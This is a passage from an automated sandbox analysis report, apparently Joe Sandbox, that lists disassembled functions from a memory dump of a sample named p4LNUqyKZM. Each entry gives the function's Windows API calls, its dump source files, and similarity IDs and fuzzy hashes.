                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LongWindow$MessageSend
                        • String ID:
                        • API String ID: 2178440468-0
                        • Opcode ID: 2fd14be2e601c332b5a6b9039bddd5f708b59ce434f7541bc1a42dd40080f867
                        • Instruction ID: b568af90b5c60e4434584c0ac608add85464d911b7398b267e0c9bce5599d745
                        • Opcode Fuzzy Hash: 2fd14be2e601c332b5a6b9039bddd5f708b59ce434f7541bc1a42dd40080f867
                        • Instruction Fuzzy Hash: 0431F234684250AFEB21CF98DC84FA53BE5FB8A721F154164F9108B2B1CB75ECA19B41
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E7769
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E778F
                        • SysAllocString.OLEAUT32(00000000), ref: 009E7792
                        • SysAllocString.OLEAUT32(?), ref: 009E77B0
                        • SysFreeString.OLEAUT32(?), ref: 009E77B9
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 009E77DE
                        • SysAllocString.OLEAUT32(?), ref: 009E77EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: 270b9738842a3179de6d91afa74c0097793af13f0dcf2287bb99ec82a944faf6
                        • Instruction ID: 1bda2bafbe09fdd40c74fe84c2e702e3c9671c6b6d3817c6a477185ea4853d45
                        • Opcode Fuzzy Hash: 270b9738842a3179de6d91afa74c0097793af13f0dcf2287bb99ec82a944faf6
                        • Instruction Fuzzy Hash: FE21B076608219AFDF11DFE9CC88DFBB3ACEB09364B048425FA05DB150D670DC828761
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E7842
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E7868
                        • SysAllocString.OLEAUT32(00000000), ref: 009E786B
                        • SysAllocString.OLEAUT32 ref: 009E788C
                        • SysFreeString.OLEAUT32 ref: 009E7895
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 009E78AF
                        • SysAllocString.OLEAUT32(?), ref: 009E78BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: 336241f8a54715e886fb3db3d45af360f5839d05e8f3ead63fc9517dc058fa8e
                        • Instruction ID: 7ed43987119ffb7db4e7fa9b9e2509d5d1b44b18473192e74f71773eda664765
                        • Opcode Fuzzy Hash: 336241f8a54715e886fb3db3d45af360f5839d05e8f3ead63fc9517dc058fa8e
                        • Instruction Fuzzy Hash: 5821B031608214AFDB11DFE9CCCCDAAB7ACEB183607108125F915CB2A0D674DC41CB65
                        APIs
                        • GetStdHandle.KERNEL32(0000000C), ref: 009F04F2
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009F052E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateHandlePipe
                        • String ID: nul
                        • API String ID: 1424370930-2873401336
                        • Opcode ID: 9573f8f6537203730c120e168737a94fba34bbe246899f54b85b5d873df22773
                        • Instruction ID: 4c0121a2518bee8270b385ca0530c364c5da3420c209a2b7d20cf108fae22be2
                        • Opcode Fuzzy Hash: 9573f8f6537203730c120e168737a94fba34bbe246899f54b85b5d873df22773
                        • Instruction Fuzzy Hash: 11216075500309ABDF209F6ADC44AAA77BCBF95724F204A19FAA1D72E1D7B0D941CF20
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 009F05C6
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009F0601
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateHandlePipe
                        • String ID: nul
                        • API String ID: 1424370930-2873401336
                        • Opcode ID: e938ba35140d7302de59ea1553fc9bd8ed0ac0dc6b15a071817738d5a7e3d5ab
                        • Instruction ID: d3ae2396113420eed440d3e9c7500c23e4b3da48fb1849ca9606faf0b23207fd
                        • Opcode Fuzzy Hash: e938ba35140d7302de59ea1553fc9bd8ed0ac0dc6b15a071817738d5a7e3d5ab
                        • Instruction Fuzzy Hash: AB21A3755003199BDB209F698C04AAA77ECBFD5734F204B19FAB1E72D1D7B09861CB10
                        APIs
                          • Part of subcall function 0098600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0098604C
                          • Part of subcall function 0098600E: GetStockObject.GDI32(00000011), ref: 00986060
                          • Part of subcall function 0098600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0098606A
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A14112
                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A1411F
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A1412A
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A14139
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A14145
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$CreateObjectStockWindow
                        • String ID: Msctls_Progress32
                        • API String ID: 1025951953-3636473452
                        • Opcode ID: 115dc4951e7ab7b15b8cd833157b2c8e33cd6ffdf8ffca91be56f989fe952faa
                        • Instruction ID: 03f9bf19b62e03bf4aa05d62dc87725f695dda1045f4b05c7726c8b9eec98e2e
                        • Opcode Fuzzy Hash: 115dc4951e7ab7b15b8cd833157b2c8e33cd6ffdf8ffca91be56f989fe952faa
                        • Instruction Fuzzy Hash: B711B2B2140219BEEF119FA4CC86EE77F6DEF097A8F004210BA18A6150C7769C61DBA4
                        APIs
                          • Part of subcall function 009BD7A3: _free.LIBCMT ref: 009BD7CC
                        • _free.LIBCMT ref: 009BD82D
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • _free.LIBCMT ref: 009BD838
                        • _free.LIBCMT ref: 009BD843
                        • _free.LIBCMT ref: 009BD897
                        • _free.LIBCMT ref: 009BD8A2
                        • _free.LIBCMT ref: 009BD8AD
                        • _free.LIBCMT ref: 009BD8B8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                        • Instruction ID: 950a6317ee48bb8feeffde864bbdff02ac409b93e0875093dc4c652007aca3fa
                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                        • Instruction Fuzzy Hash: 981121B1542B08BBE521BFB0CE87FCB7BDCAF84720F404C25B29DA6492EA65B5054650
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009EDA74
                        • LoadStringW.USER32(00000000), ref: 009EDA7B
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009EDA91
                        • LoadStringW.USER32(00000000), ref: 009EDA98
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009EDADC
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 009EDAB9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message
                        • String ID: %s (%d) : ==> %s: %s %s
                        • API String ID: 4072794657-3128320259
                        • Opcode ID: 5733d554c2bd95ad76f5a9d98ecadf34f5a06160f67ad2938671c9287a9c6714
                        • Instruction ID: b0ac014d5eb87dbffe90575a7e6bc22aa2b4404520822de92271e1f1108d79fb
                        • Opcode Fuzzy Hash: 5733d554c2bd95ad76f5a9d98ecadf34f5a06160f67ad2938671c9287a9c6714
                        • Instruction Fuzzy Hash: 970186F65402087FE711DBE09D89FE7336CE708311F4049A1B716E2041E6749E854F74
                        APIs
                        • InterlockedExchange.KERNEL32(0135E430,0135E430), ref: 009F097B
                        • EnterCriticalSection.KERNEL32(0135E410,00000000), ref: 009F098D
                        • TerminateThread.KERNEL32(0135E428,000001F6), ref: 009F099B
                        • WaitForSingleObject.KERNEL32(0135E428,000003E8), ref: 009F09A9
                        • CloseHandle.KERNEL32(0135E428), ref: 009F09B8
                        • InterlockedExchange.KERNEL32(0135E430,000001F6), ref: 009F09C8
                        • LeaveCriticalSection.KERNEL32(0135E410), ref: 009F09CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: c45027c8b21bd8d17ce61e179c3c1f8c5e79e9a1b05c53ea584b6a115f85e83a
                        • Instruction ID: 6f68a98fe89e9b9e5428f7d2f686ce80ce137c5c97030bb16890624426cf8ed0
                        • Opcode Fuzzy Hash: c45027c8b21bd8d17ce61e179c3c1f8c5e79e9a1b05c53ea584b6a115f85e83a
                        • Instruction Fuzzy Hash: A5F03131482622BBD751AFD4EE8CBE6BB39FF51712F405015F201508A1D7749466CF90
                        APIs
                        • GetClientRect.USER32(?,?), ref: 00985D30
                        • GetWindowRect.USER32(?,?), ref: 00985D71
                        • ScreenToClient.USER32(?,?), ref: 00985D99
                        • GetClientRect.USER32(?,?), ref: 00985ED7
                        • GetWindowRect.USER32(?,?), ref: 00985EF8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Rect$Client$Window$Screen
                        • String ID:
                        • API String ID: 1296646539-0
                        • Opcode ID: 3d6a448f7e847a4c0098c4ccfadb2b1f561ef567f3e1c6ad512456d26db15f16
                        • Instruction ID: ff74478e4563a5818ad2ddb0428bc4cc0451535f287e7f458ef4552efa4c9b87
                        • Opcode Fuzzy Hash: 3d6a448f7e847a4c0098c4ccfadb2b1f561ef567f3e1c6ad512456d26db15f16
                        • Instruction Fuzzy Hash: 5CB18C34A0074ADBDB10DFA8C880BEEB7F5FF58310F14981AE8A9D7250DB34AA55DB51
                        APIs
                        • __allrem.LIBCMT ref: 009B00BA
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B00D6
                        • __allrem.LIBCMT ref: 009B00ED
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B010B
                        • __allrem.LIBCMT ref: 009B0122
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B0140
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1992179935-0
                        • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                        • Instruction ID: 3cc34d3ac5473c412fcdd184d5c5c80d4fc0af48fd48009433d7aee9f77ac500
                        • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                        • Instruction Fuzzy Hash: 8C81E372A007069FE724AA68CD52BAB73E8EFC2374F24453EF451D7281E7B4D9008B90
                        APIs
                          • Part of subcall function 00A03149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00A0101C,00000000,?,?,00000000), ref: 00A03195
                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A01DC0
                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A01DE1
                        • WSAGetLastError.WSOCK32 ref: 00A01DF2
                        • inet_ntoa.WSOCK32(?), ref: 00A01E8C
                        • htons.WSOCK32(?,?,?,?,?), ref: 00A01EDB
                        • _strlen.LIBCMT ref: 00A01F35
                          • Part of subcall function 009E39E8: _strlen.LIBCMT ref: 009E39F2
                          • Part of subcall function 00986D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0099CF58,?,?,?), ref: 00986DBA
                          • Part of subcall function 00986D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0099CF58,?,?,?), ref: 00986DED
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                        • String ID:
                        • API String ID: 1923757996-0
                        • Opcode ID: 29010f8bc52c293e74be9ce6a9178452ee42b8e7643b411975083078c7677eb4
                        • Instruction ID: 7408962901c5bf4a7a9060e2da809228a388055ef46b12f9b1e09788134b8ec8
                        • Opcode Fuzzy Hash: 29010f8bc52c293e74be9ce6a9178452ee42b8e7643b411975083078c7677eb4
                        • Instruction Fuzzy Hash: 2EA1DC31204305AFC724EB24D885FAABBE5AFC5318F54894CF4569B2E2DB31ED42CB91
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009A82D9,009A82D9,?,?,?,009B644F,00000001,00000001,8BE85006), ref: 009B6258
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009B644F,00000001,00000001,8BE85006,?,?,?), ref: 009B62DE
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009B63D8
                        • __freea.LIBCMT ref: 009B63E5
                          • Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852
                        • __freea.LIBCMT ref: 009B63EE
                        • __freea.LIBCMT ref: 009B6413
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                        • String ID:
                        • API String ID: 1414292761-0
                        • Opcode ID: 6aba2e229c5c23e9d38ac47cb55b3a71f258031cbf2bab4638e8a5dd5e1cfff4
                        • Instruction ID: 10e5259da6331b2e06c985211790a028bc131e9d852dca0eff9b101f1c4c2629
                        • Opcode Fuzzy Hash: 6aba2e229c5c23e9d38ac47cb55b3a71f258031cbf2bab4638e8a5dd5e1cfff4
                        • Instruction Fuzzy Hash: 2851B172A00216ABEB258FA4DE81FFF77AAEB84770F154629FC05D6150DB38EC44C660
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 00A0C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A0B6AE,?,?), ref: 00A0C9B5
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0C9F1
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA68
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0BCCA
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0BD25
                        • RegCloseKey.ADVAPI32(00000000), ref: 00A0BD6A
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A0BD99
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A0BDF3
                        • RegCloseKey.ADVAPI32(?), ref: 00A0BDFF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                        • String ID:
                        • API String ID: 1120388591-0
                        • Opcode ID: 6bcf48348f6648ba0db677ab05a160436cef3f54070ef2569e5fc5bf8ad83b32
                        • Instruction ID: 5c6fc8b273a56825cdfe363224d5eca0b7424bf1dc6386ac1d19a02a19952ba7
                        • Opcode Fuzzy Hash: 6bcf48348f6648ba0db677ab05a160436cef3f54070ef2569e5fc5bf8ad83b32
                        • Instruction Fuzzy Hash: 7B81C030218245EFD714DF24D991E2ABBE5FF84308F14855CF4598B2A2DB31ED45CBA2
                        APIs
                        • VariantInit.OLEAUT32(00000035), ref: 009DF7B9
                        • SysAllocString.OLEAUT32(00000001), ref: 009DF860
                        • VariantCopy.OLEAUT32(009DFA64,00000000), ref: 009DF889
                        • VariantClear.OLEAUT32(009DFA64), ref: 009DF8AD
                        • VariantCopy.OLEAUT32(009DFA64,00000000), ref: 009DF8B1
                        • VariantClear.OLEAUT32(?), ref: 009DF8BB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$ClearCopy$AllocInitString
                        • String ID:
                        • API String ID: 3859894641-0
                        • Opcode ID: 1293461f6334055da678359a69170dea63bde879e3c551de77c2fb2fe0946a22
                        • Instruction ID: f717a62bc2ad8842bc78a4f174caa310e9033ed40f4655c769ab0e9fbe47cabd
                        • Opcode Fuzzy Hash: 1293461f6334055da678359a69170dea63bde879e3c551de77c2fb2fe0946a22
                        • Instruction Fuzzy Hash: 3E51C635980310BACF14AB65D8B6B39B3A8EF85310B24C867E907EF391DB748C40C796
                        APIs
                          • Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        • GetOpenFileNameW.COMDLG32(00000058), ref: 009F94E5
                        • _wcslen.LIBCMT ref: 009F9506
                        • _wcslen.LIBCMT ref: 009F952D
                        • GetSaveFileNameW.COMDLG32(00000058), ref: 009F9585
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$FileName$OpenSave
                        • String ID: X
                        • API String ID: 83654149-3081909835
                        • Opcode ID: 9633b7f2f4f055d0baa0f0e10ed5349c38ba60fb58986c56efe05f44dde614f0
                        • Instruction ID: 8f160e3aa0b82fc58480fc9e2bab66bf741900abadbe95031c3b70a340ef3b28
                        • Opcode Fuzzy Hash: 9633b7f2f4f055d0baa0f0e10ed5349c38ba60fb58986c56efe05f44dde614f0
                        • Instruction Fuzzy Hash: EEE178316083119FD724EF24C881B6AB7E4BF85314F14896DF9999B3A2DB31ED05CB92
                        APIs
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        • BeginPaint.USER32(?,?,?), ref: 00999241
                        • GetWindowRect.USER32(?,?), ref: 009992A5
                        • ScreenToClient.USER32(?,?), ref: 009992C2
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009992D3
